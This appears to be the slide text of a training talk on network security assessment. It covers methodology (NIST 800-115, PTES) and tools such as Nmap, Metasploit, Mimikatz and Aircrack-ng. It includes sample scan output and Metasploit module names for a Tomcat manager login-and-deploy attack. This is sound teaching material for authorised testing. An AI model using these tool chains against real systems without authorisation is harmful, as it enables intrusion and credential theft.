Key Tools for a Network Security

Assessment

John Tannahill, CA, CISM, CGEIT, CRISC

jtannahi@rogers.com

Areas of Coverage

• Network Security Assessment Areas

• Methodology & Tools

• Reconnaissance

• TCP/IP Service Enumeration

• Network Vulnerability / Network Penetration Assessments

Network Security Assessments

• Internet Perimeter

• Virtual Private Networks– Business Partner

– Employee Remote Access

• Network Device Configurations– Firewall; Switch (VLAN)

• Sensitive Network Subnets / Segments

• Wireless LAN Infrastructure

• Remote Access

3

Network Security Controls

• Defense in Depth

• Firewalls - Security Zones

• Network Segmentation / Isolation

• Traffic Flow (Ingress / Egress)

• Hardened OS

• Hardened TCP/IP Services

• IDS/IPS/SIEM Architecture

• Network Management

4

Next Generation Firewalls

• Functions Used / Implemented (e.g. Palo Alto)– Policy based - user-id / context– Wildfire (Anti-malware; Anti-Spyware) -

cloud service– Vulnerability Protection– URL Filtering– Data Filtering (e.g. SSN)– Zone Protection (Trusted / Untrusted)– SSL Decryption (inbound / outbound)

• NGFW Security Configuration Standards

5

Network Security Assessments

• Vulnerability Assessment Areas– Network– Browser– Web / Mobile Application– Mobile Device– Social Engineering– Physical Ingress (Raspberry Pi)

• Host-Based Assessment (e.g. Windows OS)• TCP/IP Service Assessment (e.g. Database)• Penetration Testing• Red Team / Blue Team

6

Common Network Vulnerabilities

• Network services with known vulnerabilities and not patched

• Network services / applications that are not properly configured or secured

• Network services with poor authentication

• Network transmission of clear text passwords and traffic

7

8

Network Vulnerability Assessment Approach

• Reconnaissance– ping sweep– dns– Maltego– Shodan– Google Hacks

• TCP/IP Service Enumeration• Vulnerability Identification

– Network probes for known vulnerabilities– Exploit identification based on tcp/ip services found

• Exploit Testing– exploit code

9

Testing Methodologies

• NIST Special Publication 800-115

– Technical Guide to Information Security Testing and Assessment

• Penetration Execution Standard

• PCI Guidelines

SP800-115 Overview

• Security Testing and Examination Overview– Information Security Assessment Methodology

– Technical Assessment Techniques

• Target Identification and Analysis Techniques

• Target Vulnerability Validation Techniques

• Security Assessment Planning

• Security Assessment Execution

• Post-Testing Activities

10

800-115 – Pen Test Areas

11

Penetration Testing Execution Standard

12

Penetration Test Guidance

13

Red Team Exercises

• Red Team

• Blue Team

14

15

Kali Distributions

• Pre-built Linux OS with Security and Audit Toolkit

• www.kali.org

• Kali Walkthrough

• Raspberry Pi

16

Wireshark / Ettercap

Maltego

17

Shodan

18

Google Hacking Database

19

Exploit-db.com

20

Nmap (nmap.org)

• Ping Sweep

• Port Scans– TCP; UDP

• Zenmap – network topology

• Ncat

• Nping

• Ndiff

• Vulnerability scanning (NSE)

21

Nmap Scan

> nmap 192.168.1.121

PORT STATE SERVICE21/tcp open ftp22/tcp open ssh25/tcp open smtp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap443/tcp open https445/tcp open microsoft-ds1433/tcp open ms-sql-s3389/tcp open ms-term-serv5900/tcp open vnc

22

Scapy

• Python library: Scapy,

• Packet manipulation tool

• Example Uses

– Scanning

– Probing

– Attacks

– Network discovery

– Test snort rules

23

Network Vulnerability Assessment

• Generic assessment tools

– OpenVAS; Nexpose

• TCP/IP service-specific (e.g. http / database)

• Metasploit Framework

– Framework for testing and using exploit code

24

Kali – Web Testing Tools

• Local Proxies – OWASP ZAP Proxy

• Nikto

• Dirbuster

• SQL Injection Tools (sqlmap)

25

Password Cracking Tools

• John the Ripper

• Hydra

• Ophcrack

• Mimikatz

• Pass The Hash

26

27

Metasploit Framework

• Metasploit– Auxiliary Modules– Exploits– Payloads e.g. Meterpreter / Reverse Shell– BeEF– Karmetasploit– SET

• Armitage• Tomcat Example:

– use auxiliary/scanner/http/tomcat_mgr_login– use exploit/multi/http/tomcat_mgr_deploy

28

Wireless Security Assessment

• Wireless Architecture• Network Segmentation • WPA / WPA2 Security• Rogue Access Point Detection• Tools:

– Kismet – Aircrack-ng– Sslstrip– Wifi Pineapple V– Raspberry Pi

• Bluetooth

Cloud Considerations

• Security as a Service

– Assessment Tools

• Vulnerability Assessment / Penetration Testing of Cloud Services

– AWS

29

Summary

• Scope of Assessments• Scope Exclusions• Structured Methodology and Approach• Understand Tools• ‘Get out of Jail’ / Escalation Processes• Vulnerability versus Penetration Testing• Security Metrics• Remediation• 0-day Vulnerabilities

30